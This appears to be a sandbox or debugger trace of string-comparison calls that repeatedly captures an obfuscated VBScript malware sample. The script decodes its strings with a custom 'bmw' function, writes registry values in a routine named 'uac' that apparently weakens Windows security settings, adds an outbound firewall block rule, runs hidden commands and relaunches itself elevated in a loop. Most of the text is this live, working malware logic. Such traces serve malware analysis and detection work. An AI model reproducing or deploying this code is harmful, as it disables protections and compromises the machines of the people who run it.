bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.948] wcsncmp (_String1="+ chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 30 [0222.948] wcsncmp (_String1=" chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.948] wcsncmp (_String1="chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0222.948] wcsncmp (_String1="hr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run 